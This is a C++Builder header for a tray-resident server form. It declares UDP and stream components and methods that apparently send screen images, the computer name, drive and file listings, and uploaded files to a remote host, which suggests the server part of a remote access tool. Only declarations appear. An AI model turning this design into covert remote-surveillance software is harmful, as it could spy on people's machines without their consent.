//---------------------------------------------------------------------------

#ifndef main_serverH
#define main_serverH
//---------------------------------------------------------------------------
#include <Classes.hpp>
#include <Controls.hpp>
#include <StdCtrls.hpp>
#include <Forms.hpp>
#include <NMUDP.hpp>
#include "trayicon.h"
#include <ImgList.hpp>
#include <Menus.hpp>
#include <NMSTRM.hpp>
#include <Psock.hpp>
//---------------------------------------------------------------------------
class TForm1 : public TForm
{
__published:	// IDE-managed Components
        TNMUDP *NMUDP1;
        TTrayIcon *TrayIcon1;
        TImageList *ImageList1;
        TPopupMenu *PopupMenu1;
        TMenuItem *N1;
        TMenuItem *N2;
        TNMStrm *NMStrm1;
        TNMStrmServ *NMStrmServ1;
        void __fastcall NMUDP1DataReceived(TComponent *Sender,
          int NumberBytes, AnsiString FromIP, int Port);
        void __fastcall N1Click(TObject *Sender);
        void __fastcall N2Click(TObject *Sender);
        void __fastcall NMStrmServ1MSG(TComponent *Sender,
          const AnsiString sFrom, TStream *strm);
private:	// User declarations
          AnsiString RemoteHost;
          int        RemotePort;
          void  sendjpeg(int port,AnsiString host);
          void  SendComputerName(void) ;
          void  SendDriveList(void);
          void  SendFileList(AnsiString directory);
          void  SendFileAttribute(AnsiString directory);
          void  SendText(AnsiString Text);
          void  upload(AnsiString path);
          AnsiString savetopath;




public:		// User declarations
        __fastcall TForm1(TComponent* Owner);
};
//---------------------------------------------------------------------------
extern PACKAGE TForm1 *Form1;
//---------------------------------------------------------------------------
#endif
